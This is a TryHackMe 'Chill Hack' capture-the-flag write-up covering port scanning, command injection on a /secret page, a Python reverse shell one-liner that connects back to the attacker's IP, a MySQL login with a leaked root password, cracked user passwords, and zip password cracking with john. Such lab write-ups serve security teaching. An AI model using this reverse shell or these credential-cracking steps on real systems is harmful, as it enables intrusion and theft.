Chill Hack

Lab Setup

mkdir ~/Documents/TryHackMe/eJPT/ChillHack
cd ~/Documents/TryHackMe/eJPT/ChillHack
mkdir recon enumeration notes
touch notes/{README.md,vulns,creds}

export IP=10.10.44.40
export URL=http://$IP

Enumeration

First let's scan the machine for open ports. I usually do this with nmap You need to run this command as root.

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

This will take a while so I use rustscan to make a quick scan.

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Before accessing the website I like to see what can I find in ftp server. And I found something interesting, 2 possible user, Anurodh and Apaar.

Now let’s enumerate the website using feroxbuster and dirsearch

After this I found an interesting directory, /secret Here we can inject commands, but it looks that the application has some filleter.

Exploitation

After trying a lot of reverse shell I found something that it works.

export RHOST="10.8.113.25";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Now get some info about the server. Using netstat command to see connections on this machine. 9001 port is mine 53 is for DNS, so 3306 remain for investigate. 3306 port is default port for SQL.

www-data@ubuntu:/var/www/files$ netstat -tulpn 
netstat -tulpn 
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:9001          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 10.10.44.40:68          0.0.0.0:*                           -

In /var/www/files/index.php I found something interesting. I assume that this are creds for sql database.

www-data@ubuntu:/var/www/files$ mysql -h localhost -P 3306 -u root -p
mysql -h localhost -P 3306 -u root -p
Enter password: !@m+her00+@db

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4
Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu)

Let’s crack this hashes and get the passwords for apaar and anurodh.

anurodh:masterpassword apaar:dontaskdonttell

After some tries it seems that this are not the credentials for ssh , so let’s enumerate to see what can we found.

I found in home directory of apaar a file that can be read by www-data. And if you check what www-data can execute (sudo -l) you’ll see that this file can be execute.

Privilege Escalation

I came across an intriguing file in the /var/www/files/images folder, prompting me to set up a simple HTTP server using Python to facilitate the download of said file. Upon further investigation, I identified a file named backup.zip.

It seems that I need a password to unzip that file so I use john to crack that password.

$zip2john backup.zip > hash

$john hash -w=~/Documents/rockyou.txt --format=pkzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (backup.zip/source_code.php)     
1g 0:00:00:00 DONE (2023-12-03 11:18) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s total90..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

I have obtained a PHP file named source_code.php, in which I discovered credentials associated with the username 'anurodh'.

echo 'IWQwbnRLbjB3bVlwQHNzdzByZA=='| base64 -d

After some enumeration I found the answer.

PreviousBrooklyn Nine Nine NextUndiscovered

Last updated 1 year ago